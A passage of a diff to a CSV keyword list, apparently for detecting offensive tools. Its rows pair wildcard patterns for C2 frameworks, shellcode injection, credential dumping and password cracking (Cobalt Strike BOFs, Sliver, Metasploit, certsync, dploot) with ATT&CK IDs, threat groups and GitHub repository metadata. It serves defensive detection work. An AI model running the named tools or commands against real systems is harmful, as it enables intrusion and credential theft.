","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*inject-shellcode *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*injectShellcode*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*InjectShellcode*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*InjectShellCode.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectShellCodeRemote.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectShellCodeWMIFSB64*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*injectsu.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*injectsu.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*inline_assembly -Assembly *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*inlineAssembly*/execmethod*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*inlineDll*/dll*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" -"*inline-exec.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*inline-execute *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" -"*inline-execute *.o*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*inline-exec.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*inline-execute *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*inline-execute *.o*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*inline-execute *tokenprivileges.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*inline-execute StartWebClientSvc.x64.o*","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","10","4","349","45","2022-04-30T19:02:06Z","2022-04-30T10:05:02Z" "*inline-execute*whereami.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" -"*inlineExecute.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*inlineExecute.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*InlineExecute-Assembly*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","1","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*InlineShellcode*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*InlineWhispers.py*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" @@ -11700,25 +11853,25 @@ "*ins1gn1a/Frampton*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*InsecurePowerShell*","offensive_tool_keyword","InsecurePowerShell","powershell without securities features","T1059 - T1086 - T1117","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/cobbr/InsecurePowerShell","1","0","N/A","N/A","1","98","18","2017-12-19T03:40:33Z","2017-12-17T02:16:21Z" "*insecurityofthings*jackit*","offensive_tool_keyword","jackit","This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. We stand on the shoulders of giants.","T1210 - T1212 - T1560 - T1562","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/insecurityofthings/jackit","1","0","N/A","N/A","8","756","138","2020-10-01T04:37:00Z","2016-07-01T23:21:56Z" -"*insert_top_100_passwords_1_G*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*InsidePro-PasswordsPro.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*InspectAssembly.csproj*","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. ","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*InspectAssembly.exe*","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. ","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*insert_top_100_passwords_1_G*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*InsidePro-PasswordsPro.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*InspectAssembly.csproj*","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. ","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*InspectAssembly.exe*","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. ","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*install powershell-empire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*install * roadrecon*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" -"*install amass","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10153","1759","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" -"*install bloodhound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*install c2tc-domaininfo*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*install * roadrecon*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*install amass","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10160","1761","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" +"*install bloodhound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*install c2tc-domaininfo*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*install cdn-proxy*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" -"*install certsync*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" -"*install coercer*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" +"*install certsync*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*install coercer*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" "*--install -d kali-linux*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","wsl installation","N/A","N/A","N/A","N/A","N/A","N/A" "*install dploot*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" -"*install gobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation 